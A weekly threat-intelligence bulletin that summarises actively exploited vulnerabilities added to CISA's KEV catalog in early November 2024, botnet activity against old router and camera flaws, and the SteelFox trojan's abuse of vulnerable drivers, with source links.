The first week of November brought significant cybersecurity concerns as six actively exploited vulnerabilities were added to CISA’s KEV catalog. Two zero-day exploits were uncovered in PTZOptics PT30X-SDI/NDI cameras, while Google responded to a high-risk Android Framework vulnerability in its November update. New additions include a vulnerability in CyberPanel, affecting web hosting environments, and a critical vulnerability in Palo Alto Networks' Expedition tool, potentially exposing networks to unauthorized access. Notably, an old vulnerability in Nostromo has resurfaced, underscoring the importance of monitoring for emerging threats in both new and legacy software.    

Kaspersky warns of widespread attacks by the SteelFox trojan, which is targeting Windows systems with fake cracks for popular software, exploiting devices to mine cryptocurrency and steal sensitive data.

The IoT_Reaper botnet continues to exploit vulnerabilities in MVPower CCTV DVRs, maintaining its presence in the threat landscape. Meanwhile, the Zerobot botnet has turned its attention to an older vulnerability in the Apache HTTP server, dating back three years. Other well-known botnets, including Enemybot, LiquorBot, and the notorious Mirai, are also targeting a nine-year-old flaw in D-Link DIR 645 routers, demonstrating how aging vulnerabilities remain prime targets for attackers.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-8956 and CVE-2024-8957‍

Two critical zero-day vulnerabilities in PTZOptics PT30X-SDI/NDI cameras have been actively exploited by threat actors, granting them the ability to take full control of the affected devices, alter video streams and access sensitive data. These vulnerabilities impact devices running VHD PTZ camera firmware versions below 6.3.40, commonly found in cameras from PTZOptics, Multicam Systems SAS, and SMTAV Corporation, which use Hisilicon Hi3516A V600 SoC V60, V61, and V63.  Recognizing the severity, CISA has added these vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog.  

‍CVE-2024-43093

Google has patched a critical zero-day vulnerability in the Android Framework component as part of its November security update. This elevation-of-privilege vulnerability affects the Documents UI within Google Play system updates and Android Framework components. Google's advisory noted "indications that this vulnerability may be under limited, targeted exploitation," suggesting it is actively being used in specific, targeted attacks. Additionally, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the need for immediate action.

‍CVE-2024-51567

A critical remote code execution vulnerability has been identified in CyberPanel, specifically within the upgrademysqlstatus function in databases/views.py. This flaw, found in versions 2.3.6 and 2.3.7, allows unauthenticated attackers to bypass security middleware and exploit shell metacharacters in the statusfile property, leading to potential remote command execution.   Due to its severity and widespread impact, this vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.  

‍CVE-2024-5910‍

A critical missing authentication vulnerability in Palo Alto Networks’ Expedition tool, a vital asset for migrating firewall configurations to PAN-OS, poses a serious risk to organizations. Recently added to the CISA KEV catalog, this flaw highlights the elevated potential for exploitation, making it a priority for security teams. The issue is resolved in Expedition version 1.2.92 and all subsequent updates.

‍CVE-2019-16278

A critical directory traversal vulnerability in Nostromo nhttpd (version 1.9.6 and earlier) allows attackers to bypass security restrictions and execute malicious commands through crafted HTTP requests. With a CVSS score of 9.8, this vulnerability can lead to remote code execution and remains a significant security threat, despite being an older issue. Its addition to the CISA KEV catalog signals the urgency for organizations to address this flaw and secure affected systems.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

CVE-2021-41285

The Ballistix MOD Utility contains a critical local privilege escalation vulnerability in its MODAPI.sys driver (version 2.0.2.5 and earlier), which allows low-privileged users to gain unauthorized access to physical memory via the MmMapIoSpace function. Kaspersky reports that the SteelFox Trojan has actively exploited this vulnerability, using it to steal confidential information and conduct illicit cryptocurrency mining. Additionally, XMRig miner incorporates the vulnerable WinRing0.sys driver, leveraging it to facilitate unauthorized mining activities on compromised devices.

‍CVE-2020-14979

Security researchers have identified a critical vulnerability in the WinRing0_1_2_0 driver, integrated within EVGA’s Precision X1 software, which permits attackers with low privileges to escalate to SYSTEM-level access, executing commands without restriction. Kaspersky reports that this weakness has been targeted by the SteelFox Trojan, using the driver to gather sensitive information and conduct illicit cryptocurrency mining. Additionally, the same driver is embedded in the XMRig miner, making it a prime target for exploitation in mining operations.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/11/04/cisa-adds-two-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2024/11/07/cisa-adds-four-known-exploited-vulnerabilities-catalog  
3. https://www.bleepingcomputer.com/news/security/hackers-target-critical-zero-day-vulnerability-in-ptz-cameras/
4. https://www.labs.greynoise.io/grimoire/2024-10-31-sift-0-day-rce/  
5. https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zero-days-used-in-targeted-attacks/
6. https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vulnerabilities-in-live-streaming-cameras-with-the-help-of-ai  
7. https://thehackernews.com/2024/11/google-warns-of-actively-exploited-cve.html
8. https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/  
9. https://security.paloaltonetworks.com/CVE-2024-5910